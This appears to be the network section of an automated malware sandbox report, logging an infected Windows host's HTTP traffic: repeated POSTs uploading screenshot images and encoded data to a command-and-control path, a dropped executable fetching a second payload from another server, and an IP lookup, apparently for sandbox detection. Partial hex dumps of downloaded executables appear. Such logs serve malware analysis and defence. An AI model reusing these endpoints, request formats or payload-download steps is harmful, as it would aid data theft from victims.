Aug 31, 2024 22:42:12.315566063 CEST	1236	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:12 GMT Content-Type: application/octet-stream Content-Length: 1422336 Last-Modified: Sat, 31 Aug 2024 20:06:58 GMT Connection: keep-alive ETag: "66d377e2-15b400" Accept-Ranges: bytes Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 91 78 95 e7 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 a8 15 00 00 0a 00 00 00 00 00 00 ae c6 15 00 00 20 00 00 00 e0 15 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 16 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 60 c6 15 00 4b 00 00 00 00 e0 15 00 48 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 16 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELx0 @ @`KH H.text `.rsrcH@@.reloc@BH>0:re<(^a%WCExhD"6Qg)~JS2G9Y%`ag1KZ2}0Jh<;!mAKD\|C-IP(Ev#a$T]~$.GM,el\P"d#`3 g;^mwavE,~gZC\\xJJx
Aug 31, 2024 22:42:12.315685987 CEST	164	IN	Data Raw: 06 00 00 00 00 00 00 00 00 07 00 00 00 03 03 00 00 00 08 00 00 00 03 03 00 00 00 00 00 00 01 01 00 00 00 09 00 00 00 02 02 00 00 00 0a 00 00 38 31 31 38 00 00 00 00 00 a4 a4 00 00 00 01 00 00 00 81 81 00 00 00 0b 0c 0d 00 00 00 01 01 00 00 00 0e Data Ascii: 8118WW
Aug 31, 2024 22:42:12.316122055 CEST	1236	IN	Data Raw: 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 01 01 00 00 00 14 00 00 00 03 03 00 00 00 15 01 00 00 00 01 01 00 00 00 16 17 18 01 00 00 00 ff ff 00 00 00 12 13 0e 00 00 00 02 02 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 02 02 00 00 00 Data Ascii:
Aug 31, 2024 22:42:12.316127062 CEST	1236	IN	Data Raw: 11 01 00 00 00 17 17 00 00 00 14 00 00 00 03 03 00 00 00 15 01 00 00 00 17 17 00 00 00 16 17 18 01 00 00 00 be be 00 00 00 12 13 0e 00 00 00 02 02 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 18 18 00 00 00 01 00 00 00 ca ca 00 00 00 01 00 Data Ascii: ss
Aug 31, 2024 22:42:12.316133022 CEST	1236	IN	Data Raw: 00 00 00 07 07 00 00 00 01 00 00 00 61 61 00 00 00 12 13 0e 00 00 00 02 02 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 2e 2e 00 00 00 14 00 00 00 03 03 00 00 00 15 01 00 00 00 2e 2e 00 00 00 16 17 18 01 00 00 00 02 02 00 00 00 12 13 0e 00 Data Ascii: aa....////000011
Aug 31, 2024 22:42:12.316145897 CEST	1236	IN	Data Raw: 00 14 00 00 00 03 03 00 00 00 15 01 00 00 00 43 43 00 00 00 16 17 18 01 00 00 00 06 06 00 00 00 12 13 0e 00 00 00 02 02 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 44 44 00 00 00 01 00 00 00 08 08 00 00 00 01 00 00 00 71 71 00 00 00 12 13 Data Ascii: CCDDqqEEEEggFFFF88GG
Aug 31, 2024 22:42:12.316190958 CEST	656	IN	Data Raw: 00 00 00 6f 6f 00 00 00 01 00 00 00 00 00 00 00 00 12 13 0e 00 00 00 02 02 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 5b 5b 00 00 00 01 00 00 00 d0 d0 00 00 00 01 00 00 00 be be 00 00 00 12 13 0e 00 00 00 02 02 00 00 00 01 00 00 00 00 00 Data Ascii: oo[[\\QQqq]]^^__
Aug 31, 2024 22:42:12.316708088 CEST	1236	IN	Data Raw: 00 67 67 00 00 00 01 00 00 00 50 50 00 00 00 01 00 00 00 7f 7f 00 00 00 12 13 0e 00 00 00 02 02 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 68 68 00 00 00 01 00 00 00 14 14 00 00 00 01 00 00 00 63 63 00 00 00 12 13 0e 00 00 00 02 02 00 00 Data Ascii: ggPPhhcciiiijjjjkkkk
Aug 31, 2024 22:42:12.316715002 CEST	1236	IN	Data Raw: 7e 00 00 00 14 00 00 00 03 03 00 00 00 15 01 00 00 00 7e 7e 00 00 00 16 17 18 01 00 00 00 b1 b1 00 00 00 12 13 0e 00 00 00 02 02 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 7f 7f 00 00 00 01 00 00 00 27 27 00 00 00 01 00 00 00 4a 4a 00 00 Data Ascii: ~~~''JJAA8008
Aug 31, 2024 22:42:12.316720009 CEST	328	IN	Data Raw: 02 02 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 12 12 00 00 00 01 00 00 00 0b 0b 00 00 00 01 00 00 00 7b 7b 00 00 00 12 13 0e 00 00 00 02 02 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 13 13 00 00 00 01 00 00 00 c4 c4 00 00 00 01 Data Ascii: {{\|\|
Aug 31, 2024 22:42:12.320527077 CEST	1236	IN	Data Raw: 02 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 18 18 00 00 00 1b 00 00 00 06 06 00 00 00 1c 01 00 00 00 18 18 00 00 00 16 17 18 01 00 00 00 67 67 00 00 00 12 13 0e 00 00 00 02 02 00 00 00 01 00 00 00 00 00 00 00 00 11 01 00 00 00 19 19 00 Data Ascii: ggii

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49754	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:12.905199051 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTA1OTk5 Host: 185.215.113.19 Content-Length: 106151 Cache-Control: no-cache
Aug 31, 2024 22:42:12.905199051 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 31 4f 54 6b 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTA1OTk5Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:12.905199051 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:12.905199051 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:12.905297041 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:12.905297041 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:12.905359030 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:12.905359030 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:12.905359030 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:12.905450106 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:12.905450106 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:15.157114983 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49758	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:14.900520086 CEST	183	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 37 37 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000277001&unit=246122658369
Aug 31, 2024 22:42:15.760195971 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:15 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49762	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:15.464587927 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAxMzcy Host: 185.215.113.19 Content-Length: 101524 Cache-Control: no-cache
Aug 31, 2024 22:42:15.464587927 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 78 4d 7a 63 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAxMzcyContent-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:15.464690924 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:15.464692116 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:15.464730024 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:15.464730024 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:15.464764118 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:15.464765072 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:15.464988947 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:15.465028048 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:15.465028048 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:17.042515039 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49763	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:15.961411953 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:16.831671953 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:16 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:16.842643023 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:17.202584028 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:17 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0
Aug 31, 2024 22:42:17.261929035 CEST	171	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----MTAxMzcy Host: 185.215.113.19 Content-Length: 101524 Cache-Control: no-cache
Aug 31, 2024 22:42:17.262012959 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4d 54 41 78 4d 7a 63 79 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------MTAxMzcyContent-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 22:42:17.262012959 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 22:42:17.262012959 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 22:42:17.262146950 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 22:42:17.262146950 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 22:42:17.262193918 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 22:42:17.262193918 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 22:42:17.262193918 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 22:42:17.262232065 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 22:42:17.262232065 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 22:42:18.629189014 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49765	185.216.214.225	80	8176	C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:17.045286894 CEST	121	OUT	GET /Jhiidutz.exe HTTP/1.1 User-Agent: Mozilla/5.0(OpiumG4ng Win32) Host: 185.216.214.225 Cache-Control: no-cache
Aug 31, 2024 22:42:17.690931082 CEST	1236	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:17 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Fri, 09 Aug 2024 00:59:07 GMT ETag: "a5000-61f35a680ff51" Accept-Ranges: bytes Content-Length: 675840 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 64 86 02 00 14 a3 90 8b 00 00 00 00 00 00 00 00 f0 00 22 00 0b 02 30 00 00 48 0a 00 00 06 00 00 00 00 00 00 00 00 00 00 00 20 00 00 00 00 00 40 01 00 00 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 0a 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 40 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 20 00 00 00 00 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 0a 00 6e 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEd"0H @ `@@ n H.textG H `.rsrcnJ@@Hd[x8#GdP6>(=#U.RiDHx7z)V?2tsA]4rI0 Phsu;Pu7g`D.apnRa+5uxr!6}{A69/W8'eU\|x+Tq7+9Gt=JE[_MX!@96]At{"Vi%.-Ld$q-*xb^}3:c_Dk^~48AuRdclo< PX$HvN2?y6~Y"3W.CH';
Aug 31, 2024 22:42:17.690943956 CEST	1236	IN	Data Raw: dd 20 46 2a 66 a6 16 aa ca fd f2 43 cd 90 48 12 ee 78 f1 91 4b c4 ca ec 1a ae 7e b4 a7 68 be b6 47 79 57 a0 dd bc 3f 09 e1 5e 05 b1 d5 9b ce 32 ae 2c bd f3 84 ae 3e 87 60 2a 72 48 4f c0 5e a4 70 da 00 64 a6 be 89 4c 7a 0e f0 fd cd f1 4b ff 98 12 Data Ascii: FfCHxK~hGyW?^2,>`rHO^pdLzKxNi6]b^eVW3(MWoVyH@"5nbme/L#w<\7O+\|)JI%:p5r`#"X1zg'P+@,jf(sc%DAB^ZT#Tau$,2dbQ
Aug 31, 2024 22:42:17.690954924 CEST	448	IN	Data Raw: d3 a8 e4 58 2a 98 1e 63 71 4b 6f 72 d3 9b d0 e5 f7 91 c8 d8 81 8e ed c9 da 12 58 56 62 9c ba 5e af 71 87 6f 0a f8 1b 2c e0 3e cb 43 f6 5f 3c 22 7a e9 e1 26 17 6c a8 64 fd 88 94 84 86 79 fa 74 36 df 08 ea d6 dd 35 20 f9 83 0f 0d 31 cb 96 e9 a1 4e Data Ascii: X*cqKorXVb^qo,>C_<"z&ldyt65 1N,A[C~)A\-utu(Li7#-Sp+,"\}E7$BkCfUvk'<8t$4h}3Djrel`5NG'.o~"!U
Aug 31, 2024 22:42:17.690979004 CEST	1236	IN	Data Raw: e7 58 2d 11 c4 c8 9d e4 be d0 3d b8 23 a4 8d db 5c 91 26 b7 e3 a0 c2 10 9b 3c c3 d2 6d 50 bd 14 04 63 5c 70 da 87 2b 17 b3 7e bc ad 5e 1c 17 b6 3b 75 73 2c 36 a1 4d cb 73 96 0f 94 fb 9e 87 34 d6 f5 2e c4 c9 7c b2 1f 2c 9a b0 99 3f 5f 0c d4 7a d9 Data Ascii: X-=#\&<mPc\p+~^;us,6Ms4.\|,?_zynQnMXB<a@*XI]cjP[QJL6dH._'bnf)VUCifb@!S!MKIT~J+:~).8-7\
Aug 31, 2024 22:42:17.690989971 CEST	1236	IN	Data Raw: fd 3b af 28 92 73 f3 84 bf 25 cf 26 90 15 75 e7 8e b8 45 97 4e 8a f9 df fd d3 e2 d2 b2 61 b6 65 86 32 d0 50 69 0c 9f f3 24 3d 27 f8 f7 59 ea b0 9c 99 d0 c1 d0 d3 2f dd 82 57 d5 a6 b6 bf a3 00 80 65 f3 64 5b f7 6e 97 9d c9 66 8e cb 72 1b b7 8c cc Data Ascii: ;(s%&uENae2Pi$='Y/Wed[nfrM;hDP2[IR\|64t25Qb;3v!_{{Nrf=n[*Kj0\|L?'k$x.x\^e2fql_R`c ?Xn(
Aug 31, 2024 22:42:17.690999031 CEST	448	IN	Data Raw: 00 c7 02 b2 4e 88 19 0c f7 97 50 f2 f0 12 b4 36 98 62 83 40 71 a5 6e c4 fc fb 3d 74 b3 af da 16 e3 ff d2 1b a0 f1 7a c0 b5 d9 0c 97 c5 42 93 4f ab 3c ee 27 9d 72 aa 3e ab a3 6c ff 1a 0f 80 f7 64 8e 97 21 8a 3b d4 d4 e5 75 9d c3 68 56 d9 1c 6d c5 Data Ascii: NP6b@qn=tzBO<'r>ld!;uhVmrT+d?WGFPH^'h%;Tdjq?k7LBuw&Pt!L0s\|.F4VyW2)Wo)QYOIjPQm\|F1yXxQUX
Aug 31, 2024 22:42:17.691004992 CEST	1236	IN	Data Raw: 62 1f f1 fe 25 52 12 10 ff fa 73 87 d7 6b 6f 56 2b 18 e0 bd 62 d9 e6 be 50 d7 eb 97 d4 12 89 b3 9d d2 d0 cb 08 76 61 20 8a 65 4c 8d d6 00 dc 7a 67 bd 24 01 0f 55 e9 c8 b2 d3 8f 4b d0 4c 6f 36 53 95 0d 8a a5 87 2e 54 22 b8 31 80 38 8e ae c9 37 00 Data Ascii: b%RskoV+bPva eLzg$UKLo6S.T"187P0@/%o0go+f&A=.5S$["4cWi2:\xw_KI;Gvy4BC$eyeS+>kWh)*M5wz+y
Aug 31, 2024 22:42:17.691077948 CEST	224	IN	Data Raw: 95 e0 9f c5 d9 cf 97 bd e5 ae fc eb 85 63 a6 c7 32 a9 97 b5 9b 1c f3 b1 b4 28 03 d0 56 2e 3c 13 98 4f 8e 5c b4 4a 8b 73 f6 95 6f 62 04 37 0f 9e 90 5c 3c 0f e9 d2 a4 d1 45 fc 5b 1c 92 ec 40 2c c4 41 64 24 12 7b 33 13 5e bb 90 57 ee 15 d7 79 0c 62 Data Ascii: c2(V.<O\Jsob7\<E[@,Ad${3^WybxdnH7+z/y%{f9<\;IZ ^6#BmAZE1o%IBA~M2kU+$,1Y}]itfRGcM(C
Aug 31, 2024 22:42:17.691087961 CEST	1236	IN	Data Raw: 19 da f8 98 b9 b6 de b2 f5 7c ec a4 ce ed 67 df a0 84 18 a9 4e 70 40 5a 04 12 b1 f0 1d 9a 6d 3d 26 2d 18 99 eb d8 5a 1c 99 c5 5a e7 61 52 3e d7 ba f6 e5 56 80 4e f4 db 07 01 cc a7 08 e3 a7 8e 72 ad 73 f6 c9 0b e7 dc df fa 6c 4e 93 3b f1 2f 57 05 Data Ascii: \|gNp@Zm=&-ZZaR>VNrslN;/Wf5?O67\*uV}ew>W(M/`J6`?.A[mxo<$Zucn[B$^[]nAhC7wpjk#7sn&-!xAc^\-)fLb8t9g
Aug 31, 2024 22:42:17.691096067 CEST	224	IN	Data Raw: 9d 59 98 d3 ca 26 05 19 75 22 2c 59 45 a6 15 eb 43 7c 37 ae a9 35 7b 2a 83 24 4f 39 e3 b9 8f c0 13 96 a2 7c 90 6f 0f e8 4c cf ab 6e 3c 0c b1 14 b2 7e b4 f6 fe 0a a9 5a 49 8e 7a f3 d6 09 5d 2e 2c ab 8f 26 c5 89 ed aa f8 f7 15 41 dd 6a f9 db 1f 7d Data Ascii: Y&u",YEC\|75{*$O9\|oLn<~ZIz].,&Aj}5R{<:N)I)d6>YRCD@imwL%1//H"d^{h6~~WEe)5'Zh%f"aPgLp)ECFNpz)D
Aug 31, 2024 22:42:17.691106081 CEST	1236	IN	Data Raw: a8 b4 df 58 8e ac 7a a5 8d 10 b5 20 85 44 e7 66 ae 43 7a 43 8b 9a e3 46 94 4f cc 96 52 04 49 57 58 b8 7f a4 68 0e c9 50 1a d6 39 1f 3e fe 6e 57 4d e2 fe 70 af 96 2b 4d 31 58 83 f5 8c c7 e0 e6 8c 03 bd 9f 95 dc c8 a8 76 94 8f be 64 7c 4f 12 90 ab Data Ascii: Xz DfCzCFORIWXhP9>nWMp+M1Xvd\|OZ(}e8)i6Dam=J!"E:xQYt"<D}s.>M`z<?S6nMK+.ioq2Sx\|tA6d~STu&HwI@'O6$/RO@w

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.4	49766	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:17.359766006 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 22:42:18.208913088 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 22:42:18.214659929 CEST	307	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 154 Cache-Control: no-cache Data Raw: 72 3d 39 36 33 38 44 33 34 31 35 46 37 37 38 41 31 45 33 31 46 46 43 31 46 34 42 46 39 31 33 32 42 42 39 45 36 32 35 34 45 32 41 38 36 34 37 42 35 30 44 37 39 41 46 38 34 37 35 38 42 46 32 45 42 38 31 32 37 38 35 30 39 43 30 35 42 45 41 33 36 36 39 41 35 32 37 37 37 46 41 36 31 33 35 44 35 41 33 34 46 33 45 30 34 30 32 41 37 34 36 35 41 41 46 43 34 31 30 41 41 46 43 39 46 41 39 37 46 42 42 44 44 37 43 39 32 45 44 32 30 46 44 45 34 46 30 31 37 33 30 35 30 33 Data Ascii: r=9638D3415F778A1E31FFC1F4BF9132BB9E6254E2A8647B50D79AF84758BF2EB81278509C05BEA3669A52777FA6135D5A34F3E0402A7465AAFC410AAFC9FA97FBBDD7C92ED20FDE4F01730503
Aug 31, 2024 22:42:18.629184008 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 20:42:18 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.4	49768	208.95.112.1	80	3736	C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:18.346656084 CEST	80	OUT	GET /line/?fields=hosting HTTP/1.1 Host: ip-api.com Connection: Keep-Alive
Aug 31, 2024 22:42:18.822993040 CEST	175	IN	HTTP/1.1 200 OK Date: Sat, 31 Aug 2024 20:42:18 GMT Content-Type: text/plain; charset=utf-8 Content-Length: 6 Access-Control-Allow-Origin: * X-Ttl: 60 X-Rl: 44 Data Raw: 66 61 6c 73 65 0a Data Ascii: false

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.4	49769	185.215.113.19	80	7808	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 22:42:18.755551100 CEST	155	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
